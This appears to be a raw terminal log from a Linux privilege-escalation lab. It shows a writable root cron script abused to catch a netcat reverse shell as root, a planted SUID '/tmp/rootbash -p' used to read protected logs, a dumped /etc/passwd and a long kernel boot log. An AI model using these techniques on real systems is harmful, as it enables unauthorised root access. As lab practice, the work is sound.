56747 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
56852 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
569#
570* * * * * root overwrite.sh
571* * * * * root /usr/local/bin/compress.sh
572
573user@debian:~/tools/mysql-udf$ locate overwrite.sh
574locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
575/usr/local/bin/overwrite.sh
576user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
577-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
578user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
579user@debian:/usr/local/bin$ ls
580compress.sh overwrite.sh suid-env suid-env2 suid-so
581user@debian:/usr/local/bin$ cat overwrite.sh
582#!/bin/bash
583
584echo `date` > /tmp/useless
585user@debian:/usr/local/bin$ nano overwrite.sh
586user@debian:/usr/local/bin$ nc -nvlp 4444
587listening on [any] 4444 ...
588connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
589allexport off
590braceexpand on
591emacs on
592errexit off
593errtrace off
594functrace off
595hashall on
596histexpand on
597history on
598ignoreeof off
599interactive-comments on
600keyword off
601monitor off
602noclobber off
603noexec off
604noglob off
605nolog off
606notify off
607nounset off
608onecmd off
609physical off
610pipefail off
611posix off
612privileged off
613verbose off
614vi off
615xtrace off
616id
617uid=0(root) gid=0(root) groups=0(root)
618ls
619cat /etc/passwd
620root:x:0:0:root:/root:/bin/bash
621daemon:x:1:1:daemon:/usr/sbin:/bin/sh
622bin:x:2:2:bin:/bin:/bin/sh
623sys:x:3:3:sys:/dev:/bin/sh
624sync:x:4:65534:sync:/bin:/bin/sync
625games:x:5:60:games:/usr/games:/bin/sh
626man:x:6:12:man:/var/cache/man:/bin/sh
627lp:x:7:7:lp:/var/spool/lpd:/bin/sh
628mail:x:8:8:mail:/var/mail:/bin/sh
629news:x:9:9:news:/var/spool/news:/bin/sh
630uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
631proxy:x:13:13:proxy:/bin:/bin/sh
632www-data:x:33:33:www-data:/var/www:/bin/sh
633backup:x:34:34:backup:/var/backups:/bin/sh
634list:x:38:38:Mailing List Manager:/var/list:/bin/sh
635irc:x:39:39:ircd:/var/run/ircd:/bin/sh
636gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
637nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
638libuuid:x:100:101::/var/lib/libuuid:/bin/sh
639Debian-exim:x:101:103::/var/spool/exim4:/bin/false
640sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
641user:x:1000:1000:user,,,:/home/user:/bin/bash
642statd:x:103:65534::/var/lib/nfs:/bin/false
643mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
644bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
645user@debian:/usr/local/bin$
646
647login as: user
648user@10.10.170.166's password:
649Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
650
651The programs included with the Debian GNU/Linux system are free software;
652the exact distribution terms for each program are described in the
653individual files in /usr/share/doc/*/copyright.
654
655Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
656permitted by applicable law.
657Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
658user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
659user@debian:~$ cat l33t.txt
660user@debian:~$ ls
661l33t.txt myvpn.ovpn tools
662user@debian:~$ cat l33t.txt
663user@debian:~$ ls
664l33t.txt myvpn.ovpn tools
665user@debian:~$ dmesg | grep /var/log/messages
666user@debian:~$ tail -f /var/log/messages
667tail: cannot open `/var/log/messages' for reading: Permission denied
668user@debian:~$ tail -f /var/log/messages | less
669user@debian:~$ tail -f /var/log/auth.log
670tail: cannot open `/var/log/auth.log' for reading: Permission denied
671user@debian:~$ /tmp/rootbash -p
672rootbash-4.1# tail -f /var/log/messages
673Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
674Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
675Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
676Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
677Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
678Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
679Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
680Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
681Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
682Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
683
684
685
686
687
688ls
689^C
690rootbash-4.1# cat /var/log/messages
691May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
692May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
693May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
694May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
695May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
696May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
697May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
698May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
699May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
700May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
701May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
702May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
703May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
704May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
705May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
706May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
707May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
708May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
709May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
710May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
711May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
712May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
713May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
714May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
715May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
716May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
717May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
718May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
719May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
720May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
721May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
722May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
723May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
724May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
725May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
726May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
727May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
728May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
729May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
730May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
731May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
732May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
733May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
734May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
735May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
736May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
737May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
738May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
739May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
740May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
741May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
742May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
743May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
744May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
745May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
746May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
747May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
748May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
749May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
750May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
751May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
752May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
753May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
754May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
755May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
756May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
757May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
758May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
759May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
760May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
761May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
762May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
763May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
764May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
765May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
766May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
767May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
768May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
769May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
770May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
771May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
772May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
773May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
774May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
775May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
776May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
777May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
778May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
779May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
780May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
781May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
782May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
783May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
784May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
785May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
786May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
787May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
788May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
789May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
790May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
791May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
792May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
793May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
794May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
795May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
796May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
797May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
798May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
799May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
800May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
801May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
802May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
803May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
804May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
805May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
806May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
807May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
808May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
809May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
810May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
811May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
812May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
813May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
814May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
815May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
816May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
817May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
818May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
819May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
820May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
821May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
822May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
823May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
824May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
825May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
826May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
827May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
828May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
829May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
830May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
831May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
832May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
833May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
834May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
835May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
836May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
837May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
838May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
839May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
840May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
841May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
842May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
843May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
844May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
845May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
846May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
847May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
848May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
849May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
850May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
851May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
852May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
853May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
854May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
855May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
856May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
857May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
858May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
859May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
860May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
861May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
862May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
863May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
864May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
865May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
866May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
867May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
868May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
869May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
870May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
871May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
872May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
873May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
874May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
875May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
876May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
877May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
878May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
879May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
880May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
881May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
882May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
883May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
884May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
885May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
886May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
887May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
888May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
889May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
890May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
891May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
892May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
893May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
894May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
895May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
896May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
897May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
898May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
899May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
900May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
901May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
902May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
903May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
904May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
905May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
906May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
907May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
908May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
909May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
910May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
911May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
912May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
913May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
914May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
915May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
916May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
917May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
918May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
919May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
920May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
921May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
922May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
923May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
924May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
925May 15 11:32:35 debian kernel: [ 0.905276] io scheduler cfq registered (default)
926May 15 11:32:35 debian kernel: [ 0.905491] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
927May 15 11:32:35 debian kernel: [ 0.905526] Grant table initialized
928May 15 11:32:35 debian kernel: [ 0.907463] Linux agpgart interface v0.103
929May 15 11:32:35 debian kernel: [ 0.907481] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
930May 15 11:32:35 debian kernel: [ 0.908501] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
931May 15 11:32:35 debian kernel: [ 0.909962] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
